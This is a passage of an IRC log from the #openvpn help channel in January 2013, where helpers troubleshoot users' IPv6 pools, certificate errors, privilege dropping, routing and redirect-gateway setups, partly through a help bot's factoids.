[~gustavoz@host110.190-225-90.telecom.net.ar] has quit [Quit: Leaving] 08:49 -!- zz_AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 252 seconds] 08:54 < MeanderingCode> Hey all. Is the Android client FLOSS? 08:54 -!- zu [~zu@ks387228.kimsufi.com] has quit [Remote host closed the connection] 08:56 -!- zu [~zu@ks387228.kimsufi.com] has joined #openvpn 08:57 -!- parmegv [U2FsdGVkX1@ma.sdf.org] has joined #openvpn 09:00 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 246 seconds] 09:08 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer] 09:12 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 09:14 -!- parmegv is now known as parmegv_ 09:14 -!- parmegv_ is now known as parmegv 09:14 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 09:18 -!- Minnebo__ [~Minnebo@office.exabyte.be] has joined #openvpn 09:21 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 09:32 -!- Wintereise [Wintereise@113.11.122.227] has joined #openvpn 09:35 -!- Wintereise [Wintereise@113.11.122.227] has quit [Changing host] 09:35 -!- Wintereise [Wintereise@unaffiliated/wintereise] has joined #openvpn 09:38 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:42 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has quit [Quit: valparaiso] 10:03 -!- dazo is now known as dazo|afk 10:04 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 248 seconds] 10:07 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Read error: Connection reset by peer] 10:07 -!- d12fk [~heiko@exit0.net] has left #openvpn ["?RETURN WITHOUT GOSUB"] 10:13 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 272 seconds] 10:15 < Martin`> I upgraded ubuntu to 12.04 so I was thinking 2.3.x will be in packages, but no luck with that :( 10:16 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 10:16 < Martin`> hmm just released 10:16 < Martin`> :P 10:19 < Martin`> !goal 10:19 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 10:22 -!- master_of_master [~master_of@p57B5425D.dip.t-dialin.net] has quit [Ping timeout: 248 seconds] 10:24 -!- master_of_master [~master_of@p57B53EFA.dip.t-dialin.net] has joined #openvpn 10:25 -!- dazo|afk is now known as dazo 10:27 -!- raidz_away is now known as raidz 10:35 -!- Minnebo__ [~Minnebo@office.exabyte.be] has quit [Ping timeout: 252 seconds] 10:36 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:37 -!- raidz is now known as raidz_away 10:40 -!- raidz_away is now known as raidz 10:45 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 11:00 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds] 11:11 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:13 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 245 seconds] 11:13 -!- BendIt [~ron@146-52-51-114-dynip.superkabel.de] has joined #openvpn 11:13 < BendIt> hey guys 11:15 < BendIt> just a short question to clarify that for me. openvpn supports ipv6 as of 2.3.0, so do i need an ipv4 address for each client also to get it working? 11:16 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 240 seconds] 11:17 <@dazo> BendIt: currently, yes, you do need an IPv4 pool as well ... the developer behind the IPv6 payload patches have it on his TODO list to fix this, but nothing ready yet 11:18 <@dazo> BendIt: but you don't have to route the IPv4 traffic if you don't need it ... just remove any "route" statements related to the IPv4 networking 11:18 < BendIt> ah ok. thanks. so its planed, that you wont need this anymore when its done? :) 11:18 <@dazo> (and you can even block that IPv4 in your firewall) 11:18 <@dazo> BendIt: it's done sometime in the future ... that's as accurate as I can be right now 11:19 < BendIt> yeah, no problem, i can wait and i know, its done when its done 11:20 < BendIt> is there a sample config file for client and server available? i couldnt find one which shows a usable configuration with ipv6? 11:21 <@dazo> BendIt: http://www.greenie.net/ipv6/openvpn.html ... in addition to the man page, of course (it should all be there too) 11:21 <@vpnHelper> Title: Gert Döring - IPv6 Payload Patch for OpenVPN (at www.greenie.net) 11:21 <@dazo> (that's the docs from the patch contributor) 11:21 < BendIt> thank you so much dazu, ill have a look ;) 11:22 < BendIt> dazo, sry 11:22 <@dazo> no worries! 11:38 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Ping timeout: 244 seconds] 11:43 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 11:45 -!- BendIt [~ron@146-52-51-114-dynip.superkabel.de] has quit [Quit: Verlassend] 11:47 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Read error: Operation timed out] 11:49 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:49 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:49 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:50 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 11:57 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 11:57 -!- zz_AsadH is now known as AsadH 11:57 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 11:57 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 12:03 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 12:03 -!- mode/#openvpn [+v s7r] by ChanServ 12:16 -!- oconnore [~eric@38.111.17.138] has joined #openvpn 12:17 < oconnore> hi, I have an openvpn install and I am trying to add a new user. The user has a crt that has been signed with the same CA that the server crt was signed with, but I am getting "self signed certificate" error. It's not a self signed certificate! What could be going wrong? 12:19 < oconnore> I have checked the fingerprints of the ca.crt files on both server and client, and they match 12:19 < oconnore> I have checked that the server crt verifies with that CA. I have checked that the client crt verifies with that CA. 12:19 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 12:20 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Ping timeout: 276 seconds] 12:23 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 12:30 <@dazo> oconnore: double check your certificates ... with openssl and grep you can do this: openssl x509 -noout -text -in | egrep "Issuer:|Subject:" 12:31 <@dazo> if you do this on the client cert .... you should see two lines, Issuer: and Subject: ... and they should be different 12:32 <@dazo> If the contents of these two lines are basically identical, then you've done something wrong 12:32 <@dazo> (openvpn doesn't complain about self-signed certificates without a reason) 12:36 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 12:37 < jackbrown> If I use a main proxy into my configuration then i connect to a VPN, the VPN what will see? My proxy IP or my Machine IP ? 12:48 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Read error: Connection reset by peer] 13:03 <@dazo> jackbrown: if your VPN client connects via a proxy, the VPN server will see the IP of your proxy 13:03 < jackbrown> ok 13:19 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 13:21 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has joined #openvpn 13:28 < oconnore> dazo: thanks, my colleague's vpn client made a private copy of the configuration directory, so the certs that I was checking were not being loaded. 13:29 -!- dazo is now known as dazo_afk 13:36 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has quit [Read error: Operation timed out] 13:36 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 276 seconds] 13:37 -!- mdw [~mdw@81.171.97.233] has joined #openvpn 13:38 -!- oconnore [~eric@38.111.17.138] has left #openvpn [] 13:45 -!- Wintereise [Wintereise@unaffiliated/wintereise] has quit [] 13:45 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 13:46 -!- mdw [~mdw@81.171.97.233] has quit [Ping timeout: 276 seconds] 13:50 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has joined #openvpn 14:17 -!- else- [~else@towely.iodev.org] has quit [Read error: Connection reset by peer] 14:22 -!- hilo [~helo@38.98.103.201] has joined #openvpn 14:22 < hilo> hello! 14:23 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Remote host closed the connection] 14:29 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 14:30 -!- Orbi [~opera@anon-185-41.vpn.ipredator.se] has left #openvpn [] 14:30 < hilo> Is anyone in here? I am trying to make use of the config lines "user nobody" and "group nogroup" to secure the process, but when I check the current processes, the process is still owned by "root" 14:33 -!- Minnebo__ [~Minnebo@78-23-254-38.access.telenet.be] has joined #openvpn 14:39 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 248 seconds] 14:50 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:51 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has joined #openvpn 14:51 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has quit [Changing host] 14:51 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 15:01 < EugeneKay> The process is started as root but drops privilegs to those users 15:02 < EugeneKay> !unpriv 15:02 <@vpnHelper> "unpriv" is see https://community.openvpn.net/openvpn/wiki/UnprivilegedUser for a write-up by EugeneKay on how to run OpenVPN without root/admin permissions. 15:02 < EugeneKay> There's a method to start it as an unprivileged user from the get-go, using sudo to perform the stuff that has to be run as root(ip addr, etc) 15:02 -!- b1rkh0ff [~b1rkh0ff@178.77.23.88] has quit [Quit: Leaving] 15:12 -!- brute11k [~brute11k@89.249.230.101] has quit [Quit: Leaving.] 15:14 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds] 15:45 -!- pekster [~rewt@openvpn/user/pekster] has joined #openvpn 15:45 -!- mode/#openvpn [+v pekster] by ChanServ 15:51 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 15:51 -!- Minnebo__ [~Minnebo@78-23-254-38.access.telenet.be] has quit [Ping timeout: 246 seconds] 15:51 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Read error: Connection reset by peer] 15:53 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 16:01 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 16:02 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 16:02 -!- Valcorb [~Valcorb@199.229.249.189] has quit [] 16:15 -!- lazerbeak [~lazerbeak@unafffiliated/lazerbeak] has quit [Quit: Leaving] 16:19 < Martin`> hmm, nice compiled openvpn, removed package, changed openvpn init.d and all services are up and running again :D 16:19 * Martin` is happy 16:19 < Martin`> :P 16:19 < Martin`> now I need to find out how ipv6 works :) 16:22 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:26 < hilo> EugeneKay, so the process shows as root even after dropping privs? 16:26 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 16:27 < hilo> EugeneKay, is there a way to test that the privs have actually been dropped? and is there any info you can share for running unpriv with sudo? 16:29 < EugeneKay> hilo - the logs should say that the privs were dropped 16:29 < Martin`> only topology subnet supported? :S 16:29 < EugeneKay> hilo - all the info I have is in the link given :-p 16:29 < EugeneKay> Martin` - anything else is a sure path to insanity 16:29 <+pekster> hilo: Shows where running as root? If I drop privs via '--user' it shows the right UID in top/htop for the process 16:30 < Martin`> EugeneKay: how do you mean? 16:30 < EugeneKay> /30 sucks 16:30 < Martin`> I use a /64 16:30 < EugeneKay> Oh, v6 on 2.3. Haven't played with that. 16:31 < Martin`> server-ipv6 2001:16f8:6:1201::/64 16:31 < Martin`> I guess that is right? or not? 16:31 < EugeneKay> Using anything other than a subnet in v6 is stupid :-p 16:31 < EugeneKay> Looks right 16:31 <+pekster> EugeneKay: PtP is still a valid configuration in IPv6 16:31 < EugeneKay> It's still a stupid one 16:32 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:32 <+pekster> If you only need to link 2 servers (eg: routers functioning as a corporate WAN link) then PtP is a much simplier solution 16:32 <+pekster> It's not for the "traditional" multi-client -> one server usecase, but OpenVPN isn't a one-size-fits-all program :P 16:33 < EugeneKay> /64s are cheap. Use a whole one for your 1-client link. 16:34 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Read error: Connection reset by peer] 16:34 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 16:34 <+pekster> Or create this many PtP links in that same IP space: 9.223372036854776e+18 ;) 16:35 < EugeneKay> I forget the RFC#, but I'm fairly sure you're not supposed to break up a network(even if it's two boxen) smaller than a /64 16:35 < EugeneKay> That's the whole point of v6 - one subnet size 16:35 < EugeneKay> And lots of em! 16:38 < Martin`> topology subnet fixed the problem 16:38 < Martin`> and it is working :D 16:38 <+pekster> net30 was s solution before subnet was available for tun to fake Windows tun links 16:38 <+pekster> It's not necessary since 2.2 16:39 < hilo> pekster, EugeneKay, it shows as root in top/htop but the logs show that it dropped privs after startup 16:39 <+pekster> Or 2.1? "a while ago" anyway 16:39 < Martin`> but standard is net30? 16:39 <+pekster> Martin`: It's the default for backwards-compat purposes 16:39 < Martin`> ok 16:39 <+pekster> If you had a 2.0.9 client, for example, it wouldn't support subnet 16:39 <+pekster> solution: don't run anchient clients ;) 16:39 <+pekster> ancient* 16:39 < Martin`> hmm it uses the internal ipv6 adres instead the one via tunnel :( 16:40 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 16:40 <+pekster> Then fix the app sending data through the tunnel to bind/source from the proper IP 16:40 <+pekster> That needs to happen on any multi-homed PC 16:41 * Martin` turns off wifi on his iphone 16:41 <+pekster> hilo: What distro? 16:41 < Martin`> yes it works now :P 16:42 < hilo> pekster, Ubuntu 12.04 server 64-bit 16:42 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 16:42 * Martin` is happy finaly openvpn is availble for the iphone :) 16:43 <+pekster> hilo: No clue then. htop shows the 'openvpn' user when I use --user openvpn --group openvpn in my config file (or via CLI) both through my distro's initscript and when I do openvpn --config file.conf on the command-line 16:44 <+pekster> Are you sure it's the right ovpn process if you have more than one? 16:44 < hilo> pekster, there is only one 16:45 < hilo> pekster, I have to run... I'll be back in an hour (commuting home) 16:46 -!- hilo [~helo@38.98.103.201] has quit [Quit: Leaving] 16:57 -!- sjuxax [~jeff@unaffiliated/sjuxax] has joined #openvpn 16:58 -!- jthunder [~jthunder@184.151.222.11] has joined #openvpn 16:59 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in] 17:01 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 17:01 < sjuxax> Hello. I have a VPN connection that seems to be working well, but I am unable to resolve a route to the VPN server's external IP address while connected. The internal IP address works fine. For instance, I can connect to an address like 10.10.10.1, the VPN server, but I can't connect to 67.45.25.xxx, the public IP of the same server. Here is my local routing table: http://dpaste.com/888218/ 17:07 <+pekster> sjuxax: That can't be true, because your kernel is consulting the routing table for every encrypted packet it sends to your VPN peer 17:07 <+pekster> If it were true, your VPN would stop working as soon as you connected with a 'redirect-gateway' style setup like you have 17:08 < sjuxax> pekster: yeah, it seems only to happen on port 25 17:08 < sjuxax> i forgot to include that part :]. Will paste in one sec. 17:09 <+pekster> Okay, then it's not a problem looking up the route. Sounds like a firewall, and it's common for ISPs to do blocking on tcp/25 due to SMTP abuse potential. It's less common to block something bound *for* tcp/25, but some ISPs require you to use their SMTP servers if you do 17:10 <+hazardous> in the US or out? 17:10 <+hazardous> from what I can tell several US ISPs block outbound 25 17:10 <+hazardous> and require you to use their smarthost to pass mail out 17:10 <+hazardous> actually a lot* 17:10 <+hazardous> seems to be less common outside the states though 17:10 < sjuxax> http://dpaste.com/888222/ 17:11 <+pekster> You have a firewall problem. OpenVPN can't really help you with that 17:11 < sjuxax> Shouldn't the ISP not even know what port I'm connecting on, since the connection is going on the VPN? 17:11 <+pekster> No, becuase that traffic isn't sent across the VPN 17:11 <+pekster> You need a route to send the encrypted packets to the host that's not over the VPN 17:11 <+pekster> ie: you can't send encrypted VPN packets across the VPN. Where would that packet go? Over the VPN? And where would that one go... 17:12 < sjuxax> Ah, traffic to the outside IP is being sent over the plaintext because the routing table says to do that so the VPN can eat the other packets. Correct? 17:12 <+pekster> Right 17:12 < sjuxax> Hmm, so is there an easy way to say "do that for everything except port VPN PORT?" 17:12 <+pekster> Don't communicate wtih that host, or write creative policy routing rules to send anything that's not the ovpn traffic (based on IP/port tupple) across the VPn anyway 17:12 <+pekster> sjuxax: That depends on what you mean by "easy" 17:13 <+pekster> It's not too hard if you're familiar with policy routing 17:13 <+pekster> If you're not, start here (for Linux) http://lartc.org/howto/ 17:13 <@vpnHelper> Title: Linux Advanced Routing & Traffic Control HOWTO (at lartc.org) 17:13 <+pekster> You'll then need to manage that part of the rotuing table adjustement yourself instead of letting openvpn do it 17:14 < sjuxax> OK. I will probably just put the vpn on a separate host. Thanks for all the help guys :) 17:14 <+pekster> Chapter 4 of that howto is where the policy routing stuff is explained, but you'd better start at the beginning if you're new to advanced iproute2 functionality 17:28 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 17:37 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 17:47 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 255 seconds] 17:48 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 17:50 -!- ch1mkey [ch1m@ns203993.ovh.net] has joined #openvpn 18:01 -!- jthunder [~jthunder@184.151.222.11] has quit [Ping timeout: 248 seconds] 18:05 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Ping timeout: 255 seconds] 18:09 -!- master_of_master [~master_of@p57B53EFA.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 18:10 -!- master_of_master [~master_of@p57B53EFA.dip.t-dialin.net] has joined #openvpn 18:25 -!- sjuxax [~jeff@unaffiliated/sjuxax] has quit [Ping timeout: 255 seconds] 18:26 -!- sjuxax [~jeff@unaffiliated/sjuxax] has joined #openvpn 18:28 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn 18:31 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 18:41 -!- sjuxax [~jeff@unaffiliated/sjuxax] has quit [Quit: Leaving.] 18:43 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 18:43 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Remote host closed the connection] 18:49 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 18:57 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 19:13 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Ping timeout: 248 seconds] 19:37 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 19:49 -!- raidz is now known as raidz_away 19:54 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 19:59 -!- p3rror [~mezgani@2001:0:53aa:64c:383b:48a0:d673:605d] has joined #openvpn 20:20 -!- p3rror [~mezgani@2001:0:53aa:64c:383b:48a0:d673:605d] has quit [Ping timeout: 245 seconds] 20:24 -!- xbskid [~asdf@cpe-67-244-148-156.rochester.res.rr.com] has joined #openvpn 20:25 < xbskid> I have a site-to-site VPN set up; I can connect fine, but I think I'm missing either some routing or firewall rules. I can ping and traceroute successfully from the client network to the server-side network, but not the other way around. 20:26 < xbskid> Performing a traceroute from the server-side network reaches the server, but goes no further. 20:26 < xbskid> Could I need an iptables route to forward traffic to the tunnel? 20:37 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 20:42 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 20:44 <+pekster> xbskid: Sounds like a firewall issue since getting an ICMP ping back means your return routing is working, as is the firewall for the reply 20:46 <+pekster> xbskid: Try a tcpdump/wireshark trace each step of the way, making sure to follow the path across each interface on your VPN peers 20:48 < xbskid> I would, but I neither have those tools nor how to use them, not to mention I'm using Tomato routers as endpoints; I imagine it would be a pain in the ass to install them. 20:48 <+pekster> You can do a poor-man's tcpdump with targetless iptables rules 20:49 < xbskid> I'll try that. 21:25 -!- hilo [~saori@cpe-68-173-145-155.nyc.res.rr.com] has joined #openvpn 21:53 -!- hilo [~saori@cpe-68-173-145-155.nyc.res.rr.com] has quit [Quit: Leaving] 21:57 -!- pyro254750 [~jmiller@c-24-99-228-251.hsd1.ga.comcast.net] has joined #openvpn 21:58 < pyro254750> having trouble getting internet access when connected to openvpn, any obvious problems that normally cause this? 22:10 <+pekster> pyro254750: Plenty, most of which boil down to a misconfiguration of the openvpn config or your routing/firewall setup 22:10 <+pekster> Perhaps this is of use: 22:10 <+pekster> !rediret 22:10 <+pekster> !redirect 22:10 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 22:10 <@vpnHelper> http://ircpimps.org/redirect.png 22:12 < pyro254750> how would I check to verify that the routing is setup correctly. I followed the standard linode setup guide, im able to connect remotely but no internet access on client pc 22:12 <+pekster> You'd follow the steps in the flowchart you were just linked 22:13 < pyro254750> sorry, was having trouble getting it open, I see that now 22:14 < pyro254750> I assume that these steps are followed while connected to the vpn? 22:20 <+pekster> Yea, besides the basic configuration items 22:22 < pyro254750> for all the items on the flowchart like "is redirect-gateway enabled" is there a command I can run to tell me if its operating, or is it simply asking if its enabled in conf files 22:24 <+pekster> It should be obvious if you increase the verbosity to 'verb 4' and check the log output what the server is or is not pushing 22:24 <+pekster> Try the manpage and read about that option if you're unclear on what it does 22:24 <+pekster> Also: 22:24 <+pekster> !provider 22:24 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 22:25 <+pekster> It's impossible to know if your provider has properly enabled ip forwarding and NAT where required, for instance 22:30 -!- pyro254750 [~jmiller@c-24-99-228-251.hsd1.ga.comcast.net] has quit [Quit: Leaving] 22:30 -!- pyro254750 [~jmiller@c-24-99-228-251.hsd1.ga.comcast.net] has joined #openvpn 22:34 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 22:43 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Read error: Connection reset by peer] 22:51 -!- pyro254750 [~jmiller@c-24-99-228-251.hsd1.ga.comcast.net] has quit [Quit: Leaving] 23:01 -!- xbskid [~asdf@cpe-67-244-148-156.rochester.res.rr.com] has quit [Read error: Connection reset by peer] 23:02 -!- xbskid [~asdf@cpe-67-244-148-156.rochester.res.rr.com] has joined #openvpn 23:03 -!- xbskid [~asdf@cpe-67-244-148-156.rochester.res.rr.com] has quit [Client Quit] 23:38 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 23:38 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has joined #openvpn 23:39 < DrCode> hi all --- Day changed Wed Jan 23 2013 00:19 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds] 00:56 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds] 01:12 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has left #openvpn [] 01:19 -!- bmanatwork [~work@cpe-70-112-107-27.austin.res.rr.com] has joined #openvpn 01:48 < bmanatwork> anyone help me with some iptables rules, i want 10.10.10.0(tun) to access anything, atm i have it able to access the internal networking and external ip of the server by pushing the routes manually 01:56 <+pekster> bmanatwork: Your question lacks enough information to suggest anything. Is this device generating its own traffic or forwarding routed traffic? What is the context of the traffic flowing across the interface? And network context. Etc. 01:56 <+pekster> You're not going to get good answers if you don't ask good questions 01:56 < bmanatwork> yeah im working on pastebining my stuff 01:57 < bmanatwork> im just slow, very sorry 02:00 < bmanatwork> http://a8.lc/bin/6ib29 02:00 <@vpnHelper> Title: Administr8 Pastebin! » 6ib29 (at a8.lc) 02:00 < bmanatwork> pekster: there is my openvpn and iptables config 02:00 < bmanatwork> sorry i was slow about it 02:01 < bmanatwork> i am wanting a client connecting to this openvpn server to be able to access that server as well as other hosts on the network its connected to (internet) 02:02 < bmanatwork> so there is a secure connection to this server for internal docs, but they can still browse the internet as normal 02:02 < bmanatwork> is that a good explanation pekster 02:02 < bmanatwork> ive been trying for weeks, but im not getting what i want 02:03 < bmanatwork> got closer tonight by adding a dns server, i can resolve ip's but still cant route 02:04 < bmanatwork> when i traceroute i get to the openvpn server 10.10.10.1 but it doesnt get to the next hopp 02:04 < bmanatwork> so i think its in my iptables rules but i dont know why 02:05 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 02:05 < bmanatwork> from my iptables output it looks like i am accepting all from 10.10.10.0 to anywhere 02:06 < bmanatwork> did you think you could help? 02:09 <+pekster> bmanatwork: You want 2 things then; pick one at a time to get working. We have some info from our bot, including handy flowcharts for each: 02:09 <+pekster> !serverlan 02:09 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 02:09 <+pekster> Then, for the redirection: 02:09 <+pekster> !redirect 02:09 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 02:09 <@vpnHelper> http://ircpimps.org/redirect.png 02:10 < bmanatwork> i have grep ipv4.ip_forward /etc/sysctl.conf 02:10 < bmanatwork> net.ipv4.ip_forward=1 02:10 < bmanatwork> so thst covers 1? 02:11 <+pekster> Yup 02:11 < bmanatwork> i have a local dns server 02:12 < bmanatwork> and def1 in my config push "redirect-gateway def1" 02:12 -!- ade_b [~Ade@109.58.202.10.bredband.tre.se] has joined #openvpn 02:12 -!- ade_b [~Ade@109.58.202.10.bredband.tre.se] has quit [Changing host] 02:12 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:12 < bmanatwork> so am i missing somethign still 02:12 < bmanatwork> im sorry im not familiar with this, i have had this working for a while for secure connections 02:12 < bmanatwork> but my boss wants to browse the internet too 02:13 < bmanatwork> !def1 02:13 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 02:14 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 02:19 -!- Minnebo [~Minnebo@mail.mms-secure.eu] has joined #openvpn 02:20 -!- Minnebo [~Minnebo@mail.mms-secure.eu] has quit [Read error: Connection reset by peer] 02:20 -!- Minnebo [~Minnebo@mail.mms-secure.eu] has joined #openvpn 02:24 -!- Minnebo [~Minnebo@mail.mms-secure.eu] has quit [Ping timeout: 246 seconds] 02:31 -!- Minnebo [~Minnebo@mail.mms-secure.eu] has joined #openvpn 02:39 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn 02:42 -!- Minnebo [~Minnebo@mail.mms-secure.eu] has quit [Ping timeout: 248 seconds] 02:42 -!- mementomori [~mementomo@unaffiliated/mementomori] has joined #openvpn 02:42 < mementomori> hi 02:43 < mementomori> I'm using openvpn 2.3.0 on windows xp and it seems like the 'route-up' script is not called 02:44 < EugeneKay> !windows 02:44 <@vpnHelper> "windows" is (#1) computers are like air conditioners, they work well until you open windows. or (#2) http://secure-computing.net/files/windows.jpg for funny or (#3) http://secure-computing.net/files/windows_2.jpg for more funny 02:45 < mementomori> EugeneKay, the links are both 404 02:45 < mementomori> :) 02:45 < EugeneKay> Yeah, ecrist's fault. 02:46 < EugeneKay> !pastebin your configs ? 02:46 < EugeneKay> !pastebin 02:46 <@vpnHelper> "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 02:46 < EugeneKay> Damn bot. 02:46 < mementomori> EugeneKay, sure, gimme a second 02:46 < EugeneKay> The windows box, really. 02:48 < mementomori> pastebin.com/encUnnJS 02:49 < EugeneKay> I suspect it's something with the \\ escaping myself 02:49 < EugeneKay> It's always escapign 02:50 < EugeneKay> Try invoking with relative paths and the --cd directive on the command line 02:50 < 